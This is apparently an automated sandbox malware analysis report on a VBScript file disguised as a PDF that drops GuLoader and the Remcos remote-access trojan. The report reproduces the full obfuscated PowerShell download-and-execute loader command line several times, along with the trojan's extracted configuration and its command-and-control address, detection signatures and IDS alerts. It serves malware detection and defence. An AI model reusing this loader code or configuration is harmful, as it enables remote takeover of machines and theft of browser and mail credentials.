Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MV STARSHIP AQUILA_pdf.vbs

Overview

General Information

Sample name:MV STARSHIP AQUILA_pdf.vbs
Analysis ID:1530551
MD5:427c143dcebde77d0881da0589b0392f
SHA1:732631d0993cb724e8e93dd146e871026e5a4874
SHA256:fd352ed76e51602f74cdf8305a6da9386d70909e91f72fbce124afe3a911322a
Tags:RATRemcosRATvbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for domain / URL
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Potential malicious VBS script found (suspicious strings)
Powershell creates an autostart link
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

  • System is w10x64
  • wscript.exe (PID: 1376 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\MV STARSHIP AQUILA_pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 4948 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#slagtstavles Talepdagogs Regnskabsafdelings Wardwomen Yokeage #>;$Ganespalter144='Triumferne';<#Whirler Kjepladser Fllesmngde #>;$Gader=$adawe+$host.UI;If ($Gader) {$Fuglearter++;}function Drunkometer($Microfibril){$Reflation=$Elektromotoren+$Microfibril.'Length'-$Fuglearter; for( $Apoplastogamous=3;$Apoplastogamous -lt $Reflation;$Apoplastogamous+=4){$Wettability='Compotation';$Forbrugermotiveringer223+=$Microfibril[$Apoplastogamous];$Dimetient='Rememberers';}$Forbrugermotiveringer223;}function Fusionsdokumentet($Achlorhydria){ &($Companioning) ($Achlorhydria);}$Malie=Drunkometer 'smaM unospuz kaiProlplal ssaO,s/ste5Dep. la0Rep sca( rWB,uiD.mnResdVekoFa wC ms ud BifNFreTRoi Kog1Bes0Apo.Cal0sip;Fir eW B.iP rnsto6pro4 at; Ni abexCa.6Ma 4 ct;Ite Gulrsu,vsev:kos1 la2s.l1 Gr.The0Ged)Udk subGBone DocBl kg,loste/Pre2Pon0Mat1 Un0Reh0F.r1Emb0Dod1Dyp BreFHypiCharsnae spf amo R xPla/Ha.1 u2H t1Goi.run0D,r ';$Partitioned=Drunkometer 'Domuou,sU teNonR El-CocaGerGEddeRhoNT gtInd ';$Konkursbehandlingens=Drunkometer 'dephDatt.lmtPispC u:In /Cli/ jee stq P u C iInspBud4 K .Ti.sAnahGeloTheppon/ChiF unvAvlMNymV ModEelpOveFslug,ra/ExtAsaftEn oHollTrosWov.CivrAstaP.arMer ';$Afspadseringspenge=Drunkometer 's,a>Dif ';$Companioning=Drunkometer ' ui BrEC.xXMik ';$Congressist='Banditter';$Flunkeyhood='\Plasmagel.Ref';Fusionsdokumentet (Drunkometer ' R $,drGIs l oOga BEx Aseklatt:Tr,ILrerMumRsvvIspaGantAskybAcalencyEpa=La,$s,vE B NCanvR a:Renast PHigpsupD Boa ssTFika f+Rin$MulFPhelsugu,erNsenksaleTesy OpHC looveoBe.DBrn ');Fusionsdokumentet (Drunkometer 'Bip$Hypg T LKrooMarBTa A.shlbas:Vanb ndAR.cD ale riFPleo TjRs lms oAspra Cal R E M T,ri=Unf$Tr K nooNoun ftKMisuKrirP,dsLasBForE skHIntANo NsafD,ecL.ugI N nBlag H.e,einsp s su.ThescolPLamLMaair,iTRib( fo$ ChaCo f PlsUd.PPupaResdAe s lyEUptRB liB kN soG ,dsBisPNgteUd.N C G,niePsa) Ac ');Fusionsdokumentet (Drunkometer 'Tio[chinU iE veTifr.salsEleE Unr favAulIH lCst.eQuapsenoRapIBa,NA eTK lM Kra A.N BeABioGRege ImRByl]sam:Re : Tys iEcopCLeoUGrur GaIEndtHeaY appAf.rUnroFutTParO CoCspao roLsp U.v=Jor on[TorNdukEetat o.No.s .oE b.cAriU A,rpomi anTL,eYLftPUroRProOPhitMalOLntC Dio orLRumt UdYAlap VaEs r]Ani: on:OrdTPauldatsAba1Bld2Dis ');$Konkursbehandlingens=$Badeformaalet[0];$Tilkendegivelsers=(Drunkometer 'Ma $Te.g,ynLwhoORe,bUnsAK slPse: reHAddi.ndlNonIPlu=UfonAlke ,eWMas-UdlOViob urjsniEBeaCDistElf Op sB sytahsseeTKlae ivMI,o. alNBefEObjtsne. unWBagesukbGaucsupLseeiXl E KnNsogTRjs ');Fusionsdokumentet ($Tilkendegivelsers);Fusionsdokumentet (Drunkometer ' ac$DemH sli smlBefi Ph.PinHR ieUn aOrddFodeKarrUresspe[ am$ urPAngaI.dr MatFatiG ntTiliUmboM snProePurdT,t]Upp=Kla$segMTamaPoll oriAf eFot ');$Daddocky=Drunkometer ' pu$La HTe,i valDipiP,l.BygDdoroE,awB dnParlMesoPo aTapdEnuFE,hitrnl MoeGri(Dat$MonKcosoUgjnsqukabsu VarGifsDrubUnceA.kh aaForn T ds,mlLitiDisnsuhgHile ednsi somb,Don$GelB AtaUdvjexeeafprGeoe ons A,)udl ';$Bajeres=$Irrigably;Fusionsdokumentet (Drunkometer ' pa$Fo G MyL gioDolB aa Prlsha: mmHDa u kaRCyrD WaL ksIProNOm GCr =Hen(R.nT FoeComs C,t a-Verp LoABygtGrehF e sen$.ogb s,ARecJ NeE ToRIn,ERegsPed) Ci ');while (!$Hurdling) {Fusionsdokumentet (Drunkometer 'Li $DilgMonlBiloNe b .raUdslAnk:TriTAf mRe t.vee Pj= a$ FotAp rJeruK temu ') ;Fusionsdokumentet $Daddocky;Fusionsdokumentet (Drunkometer 'BibsGratTeraUttr spTRsk-M lsOv lV rEProE CePBu Gru4Ryg ');Fusionsdokumentet (Drunkometer ' O,$ImmGYualArtoUtrbspaAForL U : B HR eUBarR A.DGi lBetiB onT igDkl=Gyn(KonT .ae osBroTspi-ExppHe AK,nTEdaHVen Tal$ForBEleAkryJWheE AnRUfoe sasRe ) Do ') ;Fusionsdokumentet (Drunkometer ' Le$Atrg abL,veoFugBPalAGulL ro:sluT skRbrno GaMFanl vieVi g yrA hNUn,gBryE arn His Ku= et$Nomg PlL sioCr bAlaAr cL il: krDDite.hem aoC lnBowsNonTDefRBlra Mat CeIVerofloNMits,oofReirLnpi roHPree s,dAabe UdRsky+Co +Goo%he,$Z,oBb.sAPenDIn e loFAppOsulRR pm UdAWatashaltubE soTRe . FeC ilos iuDysnTapT rn ') ;$Konkursbehandlingens=$Badeformaalet[$Tromlegangens];}$Blips=330697;$Nominalising=30103;Fusionsdokumentet (Drunkometer 'Ma.$ KnGUinL MuOsurB Gaa BuLTop: B a oxf LuTReaj s EsuinsofE ChsCal Bie=Nok Te.G D,EFortMaj-DemCIn,OMi.N frTEcoEstrn GiTTve Dra$Lakb I.achlJ E EFrerPaaEChessuk ');Fusionsdokumentet (Drunkometer '.tt$ Pag ilCykoEx,bBesa UdlUnb:Ti sEksiBotl F d oe Cab laeMrknTres,apsWalt Herwi iEksbH,vema tsw su =Kom Gl[sous Uny CosUndt .aeKnymPro. s,CNonoTi nD,iv.reesikrUn.tDa ]Hoo:afs:O sF arRadoPu mP.eBBraaFacs,ere ig6 se4 R,ssletsa.rMaaiFrinIntgRe (Ant$ TrABrnfHe tstajO eedobnshreBels Ge)Lan ');Fusionsdokumentet (Drunkometer 'Cal$ igUd l J,OB zb Una vlBje:N.ab NooPanOUndTHoat toCaspOve Def=Pr, Fri[syns caYRepsEr,TGrae.ermmaa.FreTOmde auxContY p.C me ApN C,c usoPl Ds ai loN erG Tr]sm :mar:Af AUnbsbonCDiri BoIO.d.CorgFolE.ioTAfss koT sgrB liBesNCryglu ( sa$ BrssamIBjeLAsmDs.bEBa,bf.reTeon ,hs etsscuTv.lR AkIVa bAktePa.t Op)Uns ');Fusionsdokumentet (Drunkometer ' Do$R mgE eL TuOFedb ,aA alLDin:UdjBForoMulmAftuAvaLt lDskisVi GWitaQuaRsponOoiEst.tIn = kk$PerBVidOUnwODo.t ,aTM,lO C P En.MelssysuunibDiasKlaT MaRCamis rn AngMed(skr$PatbBr l A.IBilpUdsssd ,.tj$allnskaoOutmskyi.etNCodab ulUnaITrssAknI .bnPr G Pr) Po ');Fusionsdokumentet $Bomuldsgarnet;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 2060 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#slagtstavles Talepdagogs Regnskabsafdelings Wardwomen Yokeage #>;$Ganespalter144='Triumferne';<#Whirler Kjepladser Fllesmngde #>;$Gader=$adawe+$host.UI;If ($Gader) {$Fuglearter++;}function Drunkometer($Microfibril){$Reflation=$Elektromotoren+$Microfibril.'Length'-$Fuglearter; for( $Apoplastogamous=3;$Apoplastogamous -lt $Reflation;$Apoplastogamous+=4){$Wettability='Compotation';$Forbrugermotiveringer223+=$Microfibril[$Apoplastogamous];$Dimetient='Rememberers';}$Forbrugermotiveringer223;}function Fusionsdokumentet($Achlorhydria){ &($Companioning) ($Achlorhydria);}$Malie=Drunkometer 'smaM unospuz kaiProlplal ssaO,s/ste5Dep. la0Rep sca( rWB,uiD.mnResdVekoFa wC ms ud BifNFreTRoi Kog1Bes0Apo.Cal0sip;Fir eW B.iP rnsto6pro4 at; Ni abexCa.6Ma 4 ct;Ite Gulrsu,vsev:kos1 la2s.l1 Gr.The0Ged)Udk subGBone DocBl kg,loste/Pre2Pon0Mat1 Un0Reh0F.r1Emb0Dod1Dyp BreFHypiCharsnae spf amo R xPla/Ha.1 u2H t1Goi.run0D,r ';$Partitioned=Drunkometer 'Domuou,sU teNonR El-CocaGerGEddeRhoNT gtInd ';$Konkursbehandlingens=Drunkometer 'dephDatt.lmtPispC u:In /Cli/ jee stq P u C iInspBud4 K .Ti.sAnahGeloTheppon/ChiF unvAvlMNymV ModEelpOveFslug,ra/ExtAsaftEn oHollTrosWov.CivrAstaP.arMer ';$Afspadseringspenge=Drunkometer 's,a>Dif ';$Companioning=Drunkometer ' ui BrEC.xXMik ';$Congressist='Banditter';$Flunkeyhood='\Plasmagel.Ref';Fusionsdokumentet (Drunkometer ' R $,drGIs l oOga BEx Aseklatt:Tr,ILrerMumRsvvIspaGantAskybAcalencyEpa=La,$s,vE B NCanvR a:Renast PHigpsupD Boa ssTFika f+Rin$MulFPhelsugu,erNsenksaleTesy OpHC looveoBe.DBrn ');Fusionsdokumentet (Drunkometer 'Bip$Hypg T LKrooMarBTa A.shlbas:Vanb ndAR.cD ale riFPleo TjRs lms oAspra Cal R E M T,ri=Unf$Tr K nooNoun ftKMisuKrirP,dsLasBForE skHIntANo NsafD,ecL.ugI N nBlag H.e,einsp s su.ThescolPLamLMaair,iTRib( fo$ ChaCo f PlsUd.PPupaResdAe s lyEUptRB liB kN soG ,dsBisPNgteUd.N C G,niePsa) Ac ');Fusionsdokumentet (Drunkometer 'Tio[chinU iE veTifr.salsEleE Unr favAulIH lCst.eQuapsenoRapIBa,NA eTK lM Kra A.N BeABioGRege ImRByl]sam:Re : Tys iEcopCLeoUGrur GaIEndtHeaY appAf.rUnroFutTParO CoCspao roLsp U.v=Jor on[TorNdukEetat o.No.s .oE b.cAriU A,rpomi anTL,eYLftPUroRProOPhitMalOLntC Dio orLRumt UdYAlap VaEs r]Ani: on:OrdTPauldatsAba1Bld2Dis ');$Konkursbehandlingens=$Badeformaalet[0];$Tilkendegivelsers=(Drunkometer 'Ma $Te.g,ynLwhoORe,bUnsAK slPse: reHAddi.ndlNonIPlu=UfonAlke ,eWMas-UdlOViob urjsniEBeaCDistElf Op sB sytahsseeTKlae ivMI,o. alNBefEObjtsne. unWBagesukbGaucsupLseeiXl E KnNsogTRjs ');Fusionsdokumentet ($Tilkendegivelsers);Fusionsdokumentet (Drunkometer ' ac$DemH sli smlBefi Ph.PinHR ieUn aOrddFodeKarrUresspe[ am$ urPAngaI.dr MatFatiG ntTiliUmboM snProePurdT,t]Upp=Kla$segMTamaPoll oriAf eFot ');$Daddocky=Drunkometer ' pu$La HTe,i valDipiP,l.BygDdoroE,awB dnParlMesoPo aTapdEnuFE,hitrnl MoeGri(Dat$MonKcosoUgjnsqukabsu VarGifsDrubUnceA.kh aaForn T ds,mlLitiDisnsuhgHile ednsi somb,Don$GelB AtaUdvjexeeafprGeoe ons A,)udl ';$Bajeres=$Irrigably;Fusionsdokumentet (Drunkometer ' pa$Fo G MyL gioDolB aa Prlsha: mmHDa u kaRCyrD WaL ksIProNOm GCr =Hen(R.nT FoeComs C,t a-Verp LoABygtGrehF e sen$.ogb s,ARecJ NeE ToRIn,ERegsPed) Ci ');while (!$Hurdling) {Fusionsdokumentet (Drunkometer 'Li $DilgMonlBiloNe b .raUdslAnk:TriTAf mRe t.vee Pj= a$ FotAp rJeruK temu ') ;Fusionsdokumentet $Daddocky;Fusionsdokumentet (Drunkometer 'BibsGratTeraUttr spTRsk-M lsOv lV rEProE CePBu Gru4Ryg ');Fusionsdokumentet (Drunkometer ' O,$ImmGYualArtoUtrbspaAForL U : B HR eUBarR A.DGi lBetiB onT igDkl=Gyn(KonT .ae osBroTspi-ExppHe AK,nTEdaHVen Tal$ForBEleAkryJWheE AnRUfoe sasRe ) Do ') ;Fusionsdokumentet (Drunkometer ' Le$Atrg abL,veoFugBPalAGulL ro:sluT skRbrno GaMFanl vieVi g yrA hNUn,gBryE arn His Ku= et$Nomg PlL sioCr bAlaAr cL il: krDDite.hem aoC lnBowsNonTDefRBlra Mat CeIVerofloNMits,oofReirLnpi roHPree s,dAabe UdRsky+Co +Goo%he,$Z,oBb.sAPenDIn e loFAppOsulRR pm UdAWatashaltubE soTRe . FeC ilos iuDysnTapT rn ') ;$Konkursbehandlingens=$Badeformaalet[$Tromlegangens];}$Blips=330697;$Nominalising=30103;Fusionsdokumentet (Drunkometer 'Ma.$ KnGUinL MuOsurB Gaa BuLTop: B a oxf LuTReaj s EsuinsofE ChsCal Bie=Nok Te.G D,EFortMaj-DemCIn,OMi.N frTEcoEstrn GiTTve Dra$Lakb I.achlJ E EFrerPaaEChessuk ');Fusionsdokumentet (Drunkometer '.tt$ Pag ilCykoEx,bBesa UdlUnb:Ti sEksiBotl F d oe Cab laeMrknTres,apsWalt Herwi iEksbH,vema tsw su =Kom Gl[sous Uny CosUndt .aeKnymPro. s,CNonoTi nD,iv.reesikrUn.tDa ]Hoo:afs:O sF arRadoPu mP.eBBraaFacs,ere ig6 se4 R,ssletsa.rMaaiFrinIntgRe (Ant$ TrABrnfHe tstajO eedobnshreBels Ge)Lan ');Fusionsdokumentet (Drunkometer 'Cal$ igUd l J,OB zb Una vlBje:N.ab NooPanOUndTHoat toCaspOve Def=Pr, Fri[syns caYRepsEr,TGrae.ermmaa.FreTOmde auxContY p.C me ApN C,c usoPl Ds ai loN erG Tr]sm :mar:Af AUnbsbonCDiri BoIO.d.CorgFolE.ioTAfss koT sgrB liBesNCryglu ( sa$ BrssamIBjeLAsmDs.bEBa,bf.reTeon ,hs etsscuTv.lR AkIVa bAktePa.t Op)Uns ');Fusionsdokumentet (Drunkometer ' Do$R mgE eL TuOFedb ,aA alLDin:UdjBForoMulmAftuAvaLt lDskisVi GWitaQuaRsponOoiEst.tIn = kk$PerBVidOUnwODo.t ,aTM,lO C P En.MelssysuunibDiasKlaT MaRCamis rn AngMed(skr$PatbBr l A.IBilpUdsssd ,.tj$allnskaoOutmskyi.etNCodab ulUnaITrssAknI .bnPr G Pr) Po ');Fusionsdokumentet $Bomuldsgarnet;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 1376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 3808 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2256 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ofdalrlortndq" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7064 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ofdalrlortndq" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5780 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\yzitlkwhfcfqsvnu" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1360 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\yzitlkwhfcfqsvnu" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 4020 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\bbodmcpjtkxucbcyfoug" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
{"Host:Port:Password": "154.216.18.214:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-AOD6MB", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.2058181579.00000000083B0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000008.00000002.3010031908.000000000061A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000008.00000002.3010031908.0000000000666000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000003.00000002.2039511100.00000000057BE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000003.00000002.2058610754.0000000008C40000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 6 entries
            SourceRuleDescriptionAuthorStrings
            amsi64_4948.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

              System Summary

              barindex
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\MV STARSHIP AQUILA_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\MV STARSHIP AQUILA_pdf.vbs", CommandLine|base64offset|contains: I0Hr, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\MV STARSHIP AQUILA_pdf.vbs", ProcessId: 1376, ProcessName: wscript.exe
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.56.207, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3808, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49737
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\MV STARSHIP AQUILA_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\MV STARSHIP AQUILA_pdf.vbs", CommandLine|base64offset|contains: I0Hr, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\MV STARSHIP AQUILA_pdf.vbs", ProcessId: 1376, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#slagtstavles Talepdagogs Regnskabsafdelings Wardwomen Yokeage #>;$Ganespalter144='Triumferne';<#Whirler Kjepladser Fllesmngde #>;$Gader=$adawe+$host.UI;If ($Gader) {$Fuglearter++;}function Drunkometer($Microfibril){$Reflation=$Elektromotoren+$Microfibril.'Length'-$Fuglearter; for( $Apoplastogamous=3;$Apoplastogamous -lt $Reflation;$Apoplastogamous+=4){$Wettability='Compotation';$Forbrugermotiveringer223+=$Microfibril[$Apoplastogamous];$Dimetient='Rememberers';}$Forbrugermotiveringer223;}function Fusionsdokumentet($Achlorhydria){ &($Companioning) ($Achlorhydria);}$Malie=Drunkometer 'smaM unospuz kaiProlplal ssaO,s/ste5Dep. la0Rep sca( rWB,uiD.mnResdVekoFa wC ms ud BifNFreTRoi Kog1Bes0Apo.Cal0sip;Fir eW B.iP rnsto6pro4 at; Ni abexCa.6Ma 4 ct;Ite Gulrsu,vsev:kos1 la2s.l1 Gr.The0Ged)Udk subGBone DocBl kg,loste/Pre2Pon0Mat1 Un0Reh0F.r1Emb0Dod1Dyp BreFHypiCharsnae spf amo R xPla/Ha.1 u2H t1Goi.run0D,r ';$Partitioned=Drunkometer 'Domuou,sU teNonR El-CocaGerGEddeRhoNT gtInd ';$Konkursbehandlingens=Drunkometer 'dephDatt.lmtPispC u:In /Cli/ jee stq P u C iInspBud4 K .Ti.sAnahGeloTheppon/ChiF unvAvlMNymV ModEelpOveFslug,ra/ExtAsaftEn oHollTrosWov.CivrAstaP.arMer ';$Afspadseringspenge=Drunkometer 's,a>Dif ';$Companioning=Drunkometer ' ui BrEC.xXMik ';$Congressist='Banditter';$Flunkeyhood='\Plasmagel.Ref';Fusionsdokumentet (Drunkometer ' R $,drGIs l oOga BEx Aseklatt:Tr,ILrerMumRsvvIspaGantAskybAcalencyEpa=La,$s,vE B NCanvR a:Renast PHigpsupD Boa ssTFika f+Rin$MulFPhelsugu,erNsenksaleTesy OpHC looveoBe.DBrn ');Fusionsdokumentet (Drunkometer 'Bip$Hypg T LKrooMarBTa A.shlbas:Vanb ndAR.cD ale riFPleo TjRs lms oAspra Cal R E M T,ri=Unf$Tr K nooNoun ftKMisuKrirP,dsLasBForE skHIntANo NsafD,ecL.ugI N nBlag H.e,einsp s su.ThescolPLamLMaair,iTRib( fo$ ChaCo f PlsUd.PPupaResdAe s lyEUptRB liB kN soG ,dsBisPNgteUd.N C G,niePsa) Ac ');Fusionsdokumentet (Drunkometer 'Tio[chinU iE veTifr.salsEleE Unr favAulIH lCst.eQuapsenoRapIBa,NA eTK lM Kra A.N BeABioGRege ImRByl]sam:Re : Tys iEcopCLeoUGrur GaIEndtHeaY appAf.rUnroFutTParO CoCspao roLsp U.v=Jor on[TorNdukEetat o.No.s .oE b.cAriU A,rpomi anTL,eYLftPUroRProOPhitMalOLntC Dio orLRumt UdYAlap VaEs r]Ani: on:OrdTPauldatsAba1Bld2Dis ');$Konkursbehandlingens=$Badeformaalet[0];$Tilkendegivelsers=(Drunkometer 'Ma $Te.g,ynLwhoORe,bUnsAK slPse: reHAddi.ndlNonIPlu=UfonAlke ,eWMas-UdlOViob urjsniEBeaCDistElf Op sB sytahsseeTKlae ivMI,o. alNBefEObjtsne. unWBagesukbGaucsupLseeiXl E KnNsogTRjs ');Fusionsdokumentet ($Tilkendegivelsers);Fusionsdokumentet (Drunkometer ' ac$DemH sli smlBefi Ph.PinHR ieUn aOrddFodeKarrUresspe[ am$ urPAngaI.dr MatFatiG ntTiliUmboM snProePurdT,t]Upp=Kla$segMTamaPoll oriAf eFot ');$Daddocky=Drunkometer ' pu$La HTe,i valDipiP,l.BygDdoroE,awB dnParlMesoPo aTapdEnuFE,hitrnl MoeGri(Dat$MonKcosoUgjnsqukabsu VarGifsDrubUnceA.kh aaForn T ds,mlLitiDisnsuhgHile ednsi somb,Don$GelB AtaUdvjexeeafprGeoe ons A,)udl ';$Bajeres=$Irrigably;Fusionsdo

              Stealing of Sensitive Information

              barindex
              Source: Registry Key setAuthor: Joe Security: Data: Details: C6 10 8F 4A 99 E6 71 BE D8 49 19 4A C4 38 62 E1 45 8A 69 0C DD 30 FD 53 7A 01 5A 95 E6 B9 62 DD 3F 50 CA B8 97 ED C2 BA 5E 42 4D 81 79 21 EE 69 B8 B3 DF D5 68 5E 81 E1 31 91 8B AB F7 6D 74 B7 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 3808, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-AOD6MB\exepath
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-10T08:58:01.445162+020020365941Malware Command and Control Activity Detected192.168.2.449738154.216.18.2142404TCP
              2024-10-10T08:58:02.835723+020020365941Malware Command and Control Activity Detected192.168.2.449739154.216.18.2142404TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-10T08:58:02.722681+020028033043Unknown Traffic192.168.2.449740178.237.33.5080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-10T08:57:59.210734+020028032702Potentially Bad Traffic192.168.2.449737104.21.56.20780TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000008.00000002.3010031908.0000000000666000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "154.216.18.214:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-AOD6MB", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Source: equip4.shopVirustotal: Detection: 5%Perma Link
              Source: Yara matchFile source: 00000008.00000002.3010031908.000000000061A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3010031908.0000000000666000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3808, type: MEMORYSTR
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
              Source: Binary string: CallSite.Targetore.pdbh source: powershell.exe, 00000003.00000002.2045907923.0000000007015000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: indows\System.Core.pdb0 source: powershell.exe, 00000003.00000002.2045907923.0000000007015000.00000004.00000020.00020000.00000000.sdmp
